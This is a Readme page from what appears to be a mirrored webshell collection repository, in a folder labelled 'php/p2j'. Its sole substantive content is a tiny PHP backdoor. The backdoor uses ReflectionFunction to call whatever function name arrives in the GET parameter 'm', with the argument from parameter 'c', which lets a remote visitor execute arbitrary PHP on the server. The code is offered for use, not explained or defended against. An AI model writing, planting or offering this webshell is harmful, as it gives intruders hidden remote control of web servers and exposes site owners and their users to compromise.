1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-08 22:01:27 +00:00
Files
webshell/php/p2j/Readme.md
2014-07-28 10:09:59 +08:00

14 lines
281 B
Markdown

<img src="11.jpg" alt="alt text" title="Title" />
***************************************************
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
***************************************************